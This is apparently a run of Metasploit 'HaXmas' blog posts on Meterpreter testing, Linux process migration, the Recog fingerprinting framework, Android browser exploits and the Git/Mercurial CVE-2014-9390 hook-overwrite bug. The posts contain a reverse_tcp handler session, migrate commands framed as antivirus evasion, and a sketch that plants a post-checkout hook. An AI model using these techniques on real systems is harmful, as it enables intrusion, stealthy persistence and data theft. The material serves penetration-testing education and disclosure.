Designing for testability


I'm tackling this on two fronts. On one hand, Meterpreter has some lovely test cases already in the form of the post/test/ modules. Unfortunately, these probably are not run as frequently as they should be, and are not part of our continuous integration tests. As such, they have suffered a little bit-rot. But, I have been working on cleaning these tests up and fixing issues in Meterpreter that prevent these tests from passing today. I have also been working with Jenkins and Vagrant to provision fresh victim VMs on the fly and run rc scripts with Metasploit. Tests are nice; automated tests are awesome!


Hopefully, it will not take too long to get all of these tests passing reliably with Meterpreter, and these tests have already found some interesting bugs, such as this one.


Because Meterpreter is already largely built as shared library objects, this is actually an ideal setup for unit testing. One 'simply' links a test harness executable to the libraries and away you go. However, there is a problem as hinted at above: the actual API calls parse and return Packets directly, rather than implementing a C calling convention. The more modular design of mettle should help this by giving the standard API calls a real function signature that can be tested directly, so the transport parsing, dispatch and APIs themselves can be tested separately.


This will also allow mocking up the API backend itself, making concepts like record and playback of meterpreter sessions possible for testing Metasploit post modules without a backing VM. If nothing else, 2015 should be the year of tests!


Onward, onward


There is a lot more work to do on mettle, so things may change over time. I envision it possibly replacing or living alongside the POSIX Meterpreter first, since the API breadth is lower there compared to the Windows version. It might simply live alongside Meterpreter in general, since it would be nice to have something that could be used for research and development without as much worry about breaking things in the short term. I hope your mind is also racing like mine, thinking of other uses for an event loop and disconnected command queue, like 'sleep' modes, scriptability, covert channels and similar. But for now, I am continuing with the basics of getting it as testable, buildable, efficient and reliable as possible.

This post is the eleventh in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

Hello everyone, Happy HaXmas (again) and Happy New Year! This HaXmas I would like to share with all of you a new feature which I'm personally very happy with. It's nothing super new and it has limitations, but it's the first Meterpreter feature I've collaborated on, and I'm really happy to share it with all of you: support for migrating the Linux Meterpreter payload.

Before going ahead, let me clarify something, as you can read on the meterpreter github page:

For some value of "working." Meterpreter in POSIX environments is not considered stable. It does stuff, but expect occasional problems.

Unfortunately, it applies to the process migration feature too, so be careful when using the Linux Meterpreter and this feature on your pentest! You may experience reliability problems. Hopefully these lines will also help to explain the limitations and how to use the feature!

Requirement #1: From memory

First of all, linux migrate tries to imitate the Windows migrate behavior. That means there is an important requirement: migration should happen from memory, without dropping Meterpreter to disk. On Windows this is accomplished with the well-known OpenProcess, WriteProcessMemory, CreateRemoteThread, etc. IPC APIs. But these aren't available on Linux, where we decided to use the ptrace interface to modify a process's memory and registers and control its execution. Unfortunately, this introduces the first caveats:

  1. On modern Linux distributions, ptrace restrictions usually apply, so migration isn't always possible.
  2. Once the meterpreter code is injected into the target process, the original process execution is replaced. This means the target process won't perform its original task anymore once migration has been accomplished.

That said, how do you use it? On older systems, where ptrace limitations are not in place, for example Ubuntu 10.04 (32-bit), usage is straightforward. It looks something like this:

  • Get a meterpreter session on your target:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

PAYLOAD => linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > exploit



[*] Started reverse handler on

[*] Starting the payload handler...

[*] Transmitting intermediate stager for over-sized stage...(100 bytes)

[*] Sending stage (1142784 bytes) to

[*] Meterpreter session 1 opened ( -> at 2014-12-31 10:43:02 -0600



meterpreter > getuid

Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

meterpreter > sysinfo

Computer     : ubuntu

OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)

Architecture : i686

Meterpreter  : x86/linux

meterpreter >


  • Use the ps command to find a target process. There are some things to remember:
  1. The session user must own the target process.
  2. Use interruptible (or running) processes as targets.
  3. The target process won't do its original task after migration.
  4. Remember that the Linux Meterpreter is only available as a 32-bit payload, so even when running on a 64-bit system the Meterpreter process will be 32-bit, and the migration target process must be 32-bit too.

meterpreter > ps -U juan

Filtering on user name...



Process List




PID    PPID  Name               Arch  Session  User  Path

---    ----  ----               ----  -------  ----  ----

1894   1     gnome-keyring-d          0        juan  /usr/bin/gnome-keyring-daemon --daemonize --login

1912   1220  gnome-session            0        juan  gnome-session

1946   1912  ssh-agent                0        juan  /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session

1949   1     dbus-launch              0        juan  /usr/bin/dbus-launch --exit-with-session gnome-session

1950   1     dbus-daemon              0        juan  /bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session

1953   1     gconfd-2                 0        juan  /usr/lib/libgconf2-4/gconfd-2

1960   1     gnome-settings-          0        juan  /usr/lib/gnome-settings-daemon/gnome-settings-daemon

1962   1     gvfsd                    0        juan  /usr/lib/gvfs/gvfsd

1970   1     gvfs-fuse-daemo          0        juan  /usr/lib/gvfs//gvfs-fuse-daemon /home/juan/.gvfs

1971   1     vmtoolsd                 0        juan  /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr --blockFd 3

1972   1912  polkit-gnome-au          0        juan  /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1

1975   1912  gnome-panel              0        juan  gnome-panel

1978   1912  metacity                 0        juan  metacity --replace

1981   1912  nm-applet                0        juan  nm-applet --sm-disable

1983   1     pulseaudio               0        juan  /usr/bin/pulseaudio --start --log-target=syslog

1984   1912  nautilus                 0        juan  nautilus

1985   1912  gnome-power-man          0        juan  gnome-power-manager

1986   1912  bluetooth-apple          0        juan  bluetooth-applet

1995   1983  gconf-helper             0        juan  /usr/lib/pulseaudio/pulse/gconf-helper

2020   1     gvfs-gdu-volume          0        juan  /usr/lib/gvfs/gvfs-gdu-volume-monitor

2025   1     bonobo-activati          0        juan  /usr/lib/bonobo-activation/bonobo-activation-server --ac-activate --ior-output-fd=19

2028   1     gvfs-gphoto2-vo          0        juan  /usr/lib/gvfs/gvfs-gphoto2-volume-monitor

2031   1     gvfsd-trash              0        juan  /usr/lib/gvfs/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0

2032   1     gvfs-afc-volume          0        juan  /usr/lib/gvfs/gvfs-afc-volume-monitor

2045   1     wnck-applet              0        juan  /usr/lib/gnome-panel/wnck-applet --oaf-activate-iid=OAFIID:GNOME_Wncklet_Factory --oaf-ior-fd=18

2046   1     trashapplet              0        juan  /usr/lib/gnome-applets/trashapplet --oaf-activate-iid=OAFIID:GNOME_Panel_TrashApplet_Factory --oaf-ior-fd=24

2054   1     clock-applet             0        juan  /usr/lib/gnome-panel/clock-applet --oaf-activate-iid=OAFIID:GNOME_ClockApplet_Factory --oaf-ior-fd=21

2055   1     notification-ar          0        juan  /usr/lib/gnome-panel/notification-area-applet --oaf-activate-iid=OAFIID:GNOME_NotificationAreaApplet_Factory --oaf-ior-fd=30

2058   1     indicator-apple          0        juan  /usr/lib/indicator-applet/indicator-applet-session --oaf-activate-iid=OAFIID:GNOME_FastUserSwitchApplet_Factory --oaf-ior-fd=36

2059   1     indicator-apple          0        juan  /usr/lib/indicator-applet/indicator-applet --oaf-activate-iid=OAFIID:GNOME_IndicatorApplet_Factory --oaf-ior-fd=42

2075   1     gvfsd-metadata           0        juan  /usr/lib/gvfs/gvfsd-metadata

2076   1     indicator-me-se          0        juan  /usr/lib/indicator-me/indicator-me-service

2078   1     indicator-messa          0        juan  /usr/lib/indicator-messages/indicator-messages-service

2097   1     indicator-sessi          0        juan  /usr/lib/indicator-session/indicator-session-service

2098   1     indicator-appli          0        juan  /usr/lib/indicator-application/indicator-application-service

2099   1     indicator-sound          0        juan  /usr/lib/indicator-sound/indicator-sound-service

2109   1     gvfsd-burn               0        juan  /usr/lib/gvfs/gvfsd-burn --spawner :1.6 /org/gtk/gvfs/exec_spaw/1

2112   1     gnome-terminal           0        juan  gnome-terminal

2114   1     gnome-screensav          0        juan  gnome-screensaver

2115   2112  gnome-pty-helpe          0        juan  gnome-pty-helper

2116   2112  bash                     0        juan  bash

2147   1912  gdu-notificatio          0        juan  /usr/lib/gnome-disk-utility/gdu-notification-daemon

2159   1912  evolution-alarm          0        juan  /usr/lib/evolution/2.28/evolution-alarm-notify

2160   1912  python                   0        juan  python /usr/share/system-config-printer/

2168   1912  update-notifier          0        juan  update-notifier

2310   2112  bash                     0        juan  bash

2745   1     notify-osd               0        juan  /usr/lib/notify-osd/notify-osd

2846   2112  bash                     0        juan  bash

2989   1     gvim                     0        juan  gvim

2991   2112  bash                     0        juan  bash

3378   1     [gedit] <defunct>        0        juan

5965   2846  gdb                      0        juan  gdb /bin/ls

17323  2991  [dummy] <defunct>        0        juan

18063  2310  msf.elf                  0        juan  ./msf.elf

18084  1     gcalctool                0        juan  gcalctool

23799  1     [gedit] <defunct>        0        juan


In the case above the "gcalctool" process looks like a good candidate for this demo. Of course, it wouldn't be the best candidate in a real intrusion, since the calculator probably won't live long. The easy way to use the feature is just to provide the target PID:

meterpreter > migrate 18084

[*] Migrating to 18084

[*] Migration completed successfully.

meterpreter > getpid

Current pid: 18084

meterpreter > getuid

Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000

meterpreter >


Requirement #2: Reuse the original socket

As a second requirement, in order to imitate the Windows behavior, the Meterpreter session socket is reused. On Windows a socket can be duplicated into a remote process with WSADuplicateSocket. No such API exists on Linux as far as I know; you cannot dup() a socket into a process which isn't a child. Luckily, UNIX domain sockets can be used, with one caveat: they use the filesystem (which bends the first requirement).


The most important reason for in-memory migration is to remain stealthy, avoiding security products such as antivirus that monitor the filesystem. Hopefully an antivirus won't flag a UNIX domain socket used just to share a file descriptor as malicious, which makes us think this tradeoff is not so bad! By default the UNIX domain socket will be written to /tmp, but you can specify an alternate directory with an optional second argument which the command accepts:


meterpreter > migrate -h

Usage: migrate <pid> [writable_path]



Migrates the server instance to another process.

NOTE: Any open channels or other dynamic state will be lost.


meterpreter > migrate 2075 /home/juan/.pulse

[*] Migrating to 2075

[*] Migration completed successfully.

meterpreter > getpid

Current pid: 2075


And that's all for this HaXmas introduction to Linux Meterpreter migration! As always, remember that the Meterpreter code is open source if you're interested in the details! There is a lot of work to do on the Linux Meterpreter, improving its reliability and features. It's really interesting code to work with, with lots of joys awaiting. So, if you're interested in collaborating with Metasploit, it is definitely a good place to look!


Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

The Metasploit Framework uses operating system and service fingerprints for automatic target selection and asset identification. This blog post describes a major overhaul of the fingerprinting backend within Metasploit and how you can extend it by submitting new fingerprints.


Historically, Metasploit wasn't great at fingerprinting. Shortly after the Rapid7 acquisition, we added an internal fingerprinting system to the framework, but we still depended on imports from Nexpose, Nmap, and other external tools to obtain comprehensive results. The only areas where fingerprint coverage was passable were the SMB, HTTP, and web browser rules, since many modules depended on these for automatic configuration. Metasploit has the ability to import data from dozens of external sources, including web application scanners, vulnerability scanners, and even raw PCAP files. Normalizing all of this data was a challenge and the fingerprinting backend had the job of squashing conflicting OS and service names into something that modules could easily understand.


By mid-2013, Metasploit's fingerprints were getting stale and the ruleset was becoming more tangled than ever. Changing one fingerprint required carefully reviewing all of the code paths where a conflicting rule might override the resulting value. New operating systems and services were released and the backend simply wasn't keeping up. For our Metasploit Pro customers, this was less of an issue due to the direct integration with Nexpose and Nmap, but we needed a fresh approach all the same.


Earlier in 2013, my team was looking at whether we could improve our products using existing internet-wide scan data. Our first project involved an overhaul of the Nexpose SNMP fingerprints by leveraging the Critical.IO dataset. Nexpose fingerprints are stored as a series of regular expressions within XML files. These fingerprints were easy to read, write, and test. Over the course of a week we were able to expand Nexpose's SNMP system description fingerprints to cover approximately 85% of the devices found on the internet by the Critical.IO SNMP scan. This was a quick win and made it clear that we should be looking at internet scan data as a primary source of new fingerprints.


In 2014, we took the same approach using the Project Sonar data to add fingerprints for popular HTTP services. Our approach was to sort the raw scan data by frequency, determine which fingerprints would cover the largest number of systems, and then sit down and write those fingerprints. This work improved fingerprint accuracy for our Nexpose customers and provided an opportunity to do targeted vulnerability research on the most widely exposed devices and services. The issues with the Metasploit fingerprints remained, but a plan was starting to come together.


First, we had to get sign-off to open source the Nexpose fingerprint database. Next, we had to write some wrapper code that made interfacing with and testing these fingerprints quick and painless. Finally, we had to rip out the existing Metasploit fingerprinting engine, normalize the entire framework to use the new fingerprints, and add some glue code to map Nexpose conventions to what Metasploit expected. This required a major effort across the Nexpose, Metasploit, and Labs teams and took the better part of five months to finally deliver.


The result was Recog, an open source recognition framework. Recog is now the upstream for both Nexpose and Metasploit fingerprints. We will continue to leverage Project Sonar to add and improve fingerprints, but even better, our customers and open source users can now submit new fingerprints of their own. Recog is available under a BSD 2-Clause license and can be used within your own projects, open source or otherwise, and although the test framework is written in Ruby, the XML fingerprints are easy to process in just about every language.


Metasploit users benefit through consistent formatting of third-party data imports, better fingerprinting when using scanner modules, and support for targeting newer operating systems and web browsers. Nexpose users will continue to see improvements to fingerprinting, with several major leaps in coverage as Project Sonar progresses. Metasploit contributors can take advantage of the new fingerprint.match note type to provide fingerprint suggestions to the new matching engine. If you are interested in the mechanics of how Metasploit interfaces with Recog, take a look at the OS normalization code in MDM.


Recog is a great example of Rapid7's commitment to open source and our desire to collaborate with the greater information security community. Although writing fingerprints isn't the most exciting task, accurate fingerprints are a requirement for reliable vulnerability assessments and successful penetration tests. If you are looking for a chance to contribute to Metasploit, or simply want better fingerprinting for systems within your own network, please consider submitting updates to Recog. Feel free to drop by the #metasploit channel on the Freenode IRC network if you would like to chat with the development team. If you have a new fingerprint but don't feel comfortable sending a pull request, feel free to file an Issue within the Recog repository on GitHub instead.



This post is the ninth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

It has been a busy year for Android exploitation here at Metasploit. As the makers of the greatest pentesting toolkit on the planet, we take great interest in vulnerabilities that affect over 1 billion active devices, not to mention the work of amazing independent researchers out in the world, such as Rafay Baloch and long-time contributors Joshua Drake and Tim Wright. Earlier this year I began researching exploitation vectors into Android that could affect the average user, not expecting to find much. I was in for a surprise…

The webview_addjavascriptinterface exploit (link)


In early February, I was testing a module that Joshua @jduck Drake wrote for exploiting a known vulnerability in the WebView implementation on devices before 4.2 (this represented about 70% of active devices at the time). The issue affected apps that called addJavascriptInterface to inject a Java object into the Javascript environment. This feature was commonly used by apps with ad components to render their HTML ads. By abusing Java’s reflection APIs, the Javascript code in the ad could run shell commands. jduck’s module implemented an HTTP proxy server that would man-in-the-middle (MITM) the Android device and inject malicious Javascript code into HTTP ads, in order to drop and execute a reverse shell. This worked well but required the attacker to have established a MITM stance on the target.


As I tested jduck’s module, I ran into some problems (with the sample app I had built, it turns out). Attempting to debug things a bit I opened the malicious Javascript code in the stock Android browser: to my surprise, I got a shell! I reached out to jduck who verified that indeed many stock browsers were vulnerable - 70% of all devices had a built-in browser that was trivially exploitable. This turned out to be a separate, unreported vulnerability in the AOSP Browser app. I was not the first person to notice this either - later I found references to the bug on


With my discovery in hand I tweaked jduck’s module a bit to turn it into a browser exploit, added it to Browser Autopwn, and pushed it up for review. The initial module had its share of problems - it was not compatible with 4.0 devices, and it merely gained a shell in the context of the user - many Android permissions were lost along the way (like camera). With a lot of help from community contributor timwr, we were able to get a working Android meterpreter session from the exploit that retained the permission level of the browser.

The adobe_reader_pdf_js_interface exploit (link)


Some months later, it was reported that the Adobe Reader app for Android exposed injected Java objects to Javascript code running in a PDF. After a bit of frustration, I moved the actual exploit logic into a mixin and was able to get a file format exploit module working that generated a PDF that spawned a Meterpreter session.

addJavascriptInterface lives on


In many ways, this exploit continues to be effective. For example, apps with ad views that were built before API level 17 are still vulnerable to jduck’s original MITM vector. A discussion of the issue can be seen here. Eventually Android 4.4.4 was patched to prevent the Object.getClass call from being used, closing the hole for good on new devices.

Android Meterpreter Improvements


In late May, community contributor Anwar Mohammed added many improved commands to assist in exfiltrating data from targeted devices. These commands included dump_sms, dump_calllog, and geolocate. Of course, for these commands to work, the Meterpreter process must have the necessary privileges, which depends on the exploited application. For example, some Browser apps would run with webcam permissions, meaning the webcam_snap command was available.

The Browser UXSS Dilemma (link)


In September I was reading through some public exploit code when something caught my eye - a trivial UXSS vulnerability in the Android stock browser on versions 4.3 and earlier. Security researcher Rafay Baloch had tried to report the vulnerability to Google with no success. UXSS vulnerabilities happen now and then in pretty much every browser, and allow content served by an attacker to access resources they are not supposed to - like cookies and CSRF tokens for another domain (say, What was unique about this vuln was that I was sure I had seen it before. And I had - from a 2010 bug in Chromium (reported upstream to WebKit). It's a little mysterious as to how a 2010 bug affected an OS that shipped in mid–2013. Android’s copy of WebKit was simply not kept up to date with upstream WebKit, and a bunch of security patches were missed. I had read this before (here is a 2011 presentation where ~20 WebKit bugs were found in Android 2.3, just by running through up-to-date WebKit’s layout tests), but had no idea the issue was still this exposed.


Since the exploit PoC was already public, I wrapped it into a module with a few sample attacks (UXSS exploitation is incredibly flexible) and we shipped it. After the dust settled, Google responded and backported the patch to the Android 4.3 branch, although downstream adoption from the vendors still lags the upstream 4.3 branch considerably.

The UXSS Dilemma Continues (link)


Of course, noticing a 3-year-old, previously disclosed vulnerability in Android 4.3’s WebKit implementation was just the tip of the iceberg. Rafay continued to test WebKit bugs and successfully found five different UXSS vulnerabilities still present in 4.3! And those are just the ones that were found. A complete privacy breakdown. This kind of thing makes me sad, because not so long ago I was stuck on Android 4.3…

Samsung Knox Galaxy RCE (link)


In November Quarkslab disclosed an issue affecting Samsung devices with the Knox security component. An arbitrary web page could force the user to install an attacker-supplied APK as an “update” to Knox. To exploit this, I worked with vulnerability discoverer Andre Molou to write a browser exploit that launched the update process, waited for the APK to be installed, then used an intent URL to launch the APK. The result was a one-click RCE exploit, where the user is essentially bullied into clicking “Install” (see the video).

"Open in new tab" Cookie Database Disclosure (link)


If you need another reason not to use the 4.3 browser, Rafay discovered that it was possible to open a file URL from an HTTP page by getting the user to choose “Open in new tab”. By combining this with another vulnerability to open the sqlite cookie database as an HTML document in the browser, the entire cookie database (including HTTPOnly cookies) can be stolen, which means an attacker can steal all of your sessions at once. Rafay has a good writeup of this vulnerability on his blog. Luckily Android had already patched this issue in February 2014, but adoption from the downstream vendors that still ship 4.3 devices is slow to none.

towelroot local exploit (link)


Last but not least, aforementioned contributor timwr has done some excellent work porting CVE-2014-3153, a privilege escalation bug in the Linux kernel reported by researcher geohot, into a local exploit. This would allow Meterpreter sessions on 4.4 to be upgraded to root (uid 0), although the Android permission context is lost. This module is still awaiting review, so keep an eye out for it in upcoming releases.

The Way Forward


To escape the WebKit nightmare, users are strongly advised to update to 4.4 (KitKat) or higher as soon as possible. If that’s not possible for you, it’s time to get a new device. Seriously. Even if you were to replace the AOSP browser with the Chrome app (recommended), many, many apps will likely still be vulnerable to attacks on any WebView components embedded in those apps (including addJavascriptInterface RCE for apps compiled before API level 17). On 4.4+, the WebKit implementation of WebView is replaced with (the much more up-to-date) Chromium, and all these problems disappear.


Even better, as of 5.0 (Lollipop), the Chromium system library is updated separately from the OS, allowing regular Play store updates to provide out-of-band patches for the native browser and WebView components. Such a bright future. In 2015, we expect to continue and extend our coverage of mobile and embedded devices, so keep an eye on that Pull Request queue for the up-and-coming exploits that are no doubt waiting to be discovered!

This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.


A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390.  While the folks behind CVE are still publishing the final details, Git clients (before versions 1.9.5, 2.0.5, 2.1.4, and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances.


To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients.  Under the hood, a Git or Mercurial repository on disk is really just a directory.  In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that make up the repository.  Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previously mentioned metadata.  So, in a way, if you had a Git repository called Test, Test/.git is the repository and everything else under the Test directory is simply a working copy of the files contained in the repository at a particular point in time.  A nearly identical concept also exists in Mercurial.


Here is a quick example of a simple Git repository that has no files committed to it.  As you can see, even this empty repository has a fair amount of metadata and a number of configuration files:


$  git init foo
$   tree -a foo
foo
└── .git
    ├── branches
    ├── config
    ├── description
    ├── HEAD
    ├── hooks
    │   ├── applypatch-msg.sample
    │   ├── commit-msg.sample
    │   ├── post-update.sample
    │   ├── pre-applypatch.sample
    │   ├── pre-commit.sample
    │   ├── prepare-commit-msg.sample
    │   ├── pre-rebase.sample
    │   └── update.sample
    ├── info
    │   └── exclude
    ├── objects
    │   ├── info
    │   └── pack
    └── refs
        ├── heads
        └── tags


If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory:


$ cd foo
$ date > test.txt && git add test.txt  && git commit -m "Add test.txt" -a
[master (root-commit) fb19d8e] Add test.txt
1 file changed, 1 insertion(+)
create mode 100644 test.txt
$  git log
commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0
Author: Jon Hart
Date:   Wed Dec 31 09:08:41 2014 -0800

    Add test.txt

$ tree -a .
.
├── .git
│  ├── branches
│  ├── config
│  ├── description
│  ├── HEAD
│  ├── hooks
│  │  ├── applypatch-msg.sample
│  │  ├── commit-msg.sample
│  │  ├── post-update.sample
│  │  ├── pre-applypatch.sample
│  │  ├── pre-commit.sample
│  │  ├── prepare-commit-msg.sample
│  │  ├── pre-rebase.sample
│  │  └── update.sample
│  ├── index
│  ├── info
│  │  └── exclude
│  ├── logs
│  │  ├── HEAD
│  │  └── refs
│  │      └── heads
│  │          └── master
│  ├── objects
│  │  ├── 1c
│  │  │  └── 8fe13acf2178ea5130480625eef83a59497cb0
│  │  ├── 4b
│  │  │  └── 825dc642cb6eb9a060e54bf8d69288fbee4904
│  │  ├── e5
│  │  │  └── 58a44cf7fca31e7ae5f15e370e9a35bd1620f7
│  │  ├── fb
│  │  │  └── 19d8e1e5db83b4b11bbd7ed91e1120980a38e0
│  │  ├── info
│  │  └── pack
│  └── refs
│      ├── heads
│      │  └── master
│      └── tags
└── test.txt


Similarly, for Mercurial:

$  hg init blah
$  tree -a blah
blah
└── .hg
    ├── 00changelog.i
    ├── requires
    └── store

2 directories, 2 files
$  cd blah
$  date > test.txt && hg add test.txt && hg commit -m "Add test.txt"
$  hg log
changeset:   0:ea7dac4a11f0
tag:         tip
user:        Jon Hart
date:        Wed Dec 31 09:25:07 2014 -0800
summary:     Add test.txt

$  tree -a .
.
├── .hg
│   ├── 00changelog.i
│   ├── cache
│   │   └── branch2-served
│   ├── dirstate
│   ├── last-message.txt
│   ├── requires
│   ├── store
│   │   ├── 00changelog.i
│   │   ├── 00manifest.i
│   │   ├── data
│   │   │   └── test.txt.i
│   │   ├── fncache
│   │   ├── phaseroots
│   │   ├── undo
│   │   └── undo.phaseroots
│   ├── undo.bookmarks
│   ├── undo.branch
│   ├── undo.desc
│   └── undo.dirstate
└── test.txt


These directories (.git, .hg) are created by a client when the repository is initially created or cloned.  The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples).


Want to learn more? Git Basics and Understanding Mercurial are great resources.


During routine repository operations such as cloning, updating, committing, etc., the repository working directory is updated to reflect the current state of the repository.  Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt.


This is where the trouble begins.  Both Git and Mercurial clients have had code for a long time that ensures that no commits are made to anything in the .git or .hg directories.  Because these directories control client side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository.


Unfortunately these sensitive directories were not properly protected in all cases.  Specifically:


  1. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients (before versions 1.9.5, 2.0.5, 2.1.4, and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory, which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository.  While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (partially upper case) would not be blocked, and would result in .git being modified because .giT is equivalent to .git on a case-insensitive file system.
  2. These same Git clients, as well as Mercurial versions before 3.2.3, have a nearly identical vulnerability that affects HFS+ file systems (OS X), where certain Unicode codepoints are ignored in file names.
  3. Mercurial before 3.2.3 has a nearly identical vulnerability on Windows, where MS-DOS file "short names" (the 8.3 format) are possible.
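The three cases above share one root cause: the client compares a literal path component against ".git" (or ".hg"), while the victim's file system applies its own normalization before resolving the name. The following Python sketch illustrates the idea; the helper names are hypothetical and this is not the actual Git or Mercurial source.

```python
# A small sample of codepoints that HFS+ ignores when comparing file names.
HFS_IGNORABLE = {"\u200c", "\u200d", "\u200e", "\u200f", "\ufeff"}

def naive_is_protected(path):
    # Pre-fix behavior: only the exact byte string ".git" is blocked.
    return path.split("/")[0] == ".git"

def fixed_is_protected(path):
    first = path.split("/")[0]
    # Vulnerability 2: strip codepoints that HFS+ ignores.
    first = "".join(c for c in first if c not in HFS_IGNORABLE)
    # Vulnerability 3: the 8.3 short name GIT~1 aliases .git on Windows.
    if first.upper() == "GIT~1":
        return True
    # Vulnerability 1: compare case-insensitively.
    return first.lower() == ".git"

# ".giT" slips past the naive check, yet resolves to .git on Windows/OS X.
assert not naive_is_protected(".giT/hooks/post-checkout")
assert fixed_is_protected(".giT/hooks/post-checkout")
assert fixed_is_protected(".g\u200cit/config")   # HFS+ ignorable codepoint
assert fixed_is_protected("GIT~1/config")        # 8.3 short name
```

The actual fixes in Git and Mercurial do this kind of normalization-aware comparison in the client's path-verification code, so a hostile server can no longer smuggle entries into the metadata directory by spelling its name differently.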


Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands, as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit them.


But basic exploitation is boring, so in #4440 I've spiced things up a bit.  As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git.  Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (commit, update, checkout, etc.).  By default, this module overwrites the .git/hooks/post-checkout script, which is executed upon completion of a checkout.  Conveniently, a checkout happens at clone time, so the simple act of cloning a repository can allow arbitrary code execution on the Git client.  The module goes a little bit further and provides some simplistic HTML in the hopes of luring in potentially vulnerable clients:
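To make the hook-overwrite idea concrete, here is a hedged Python sketch (not the module's actual code; the directory and payload are illustrative) of how an attacker might stage a post-checkout hook under ".giT/hooks/" on a case-sensitive file system, so that a vulnerable client on a case-insensitive file system writes it into ".git/hooks/" during the checkout at the end of a clone:

```python
import os
import tempfile

# Staging directory standing in for the attacker's repository working tree.
repo = tempfile.mkdtemp(prefix="evilrepo")

# On the attacker's case-sensitive file system, ".giT" is a distinct,
# committable name; on the victim's case-insensitive file system it
# aliases the protected ".git" directory.
hook_dir = os.path.join(repo, ".giT", "hooks")
os.makedirs(hook_dir)

# post-checkout is an ordinary shell script that Git runs after a
# checkout, including the one performed at the end of a fresh clone.
hook_path = os.path.join(hook_dir, "post-checkout")
with open(hook_path, "w") as f:
    f.write("#!/bin/sh\n# attacker-controlled commands would run here\n")

# Git only runs hooks that are marked executable.
os.chmod(hook_path, 0o755)
```

Committing and serving that tree is then just normal Git plumbing; the interesting part is only that the path check on the client side fails to recognize ".giT" as the metadata directory.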



And, if you clone it, it only looks mildly suspicious:


$ git clone
Cloning into 'ldf'...
$ cd ldf
$ git log
commit 858597e39d8a5d8e3511d404bcb210948dc835ae
Author: Deborah Phillips
Date:   Thu Apr 29 17:44:02 2004 -0500

    Initial commit to open git repository for!

The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community.


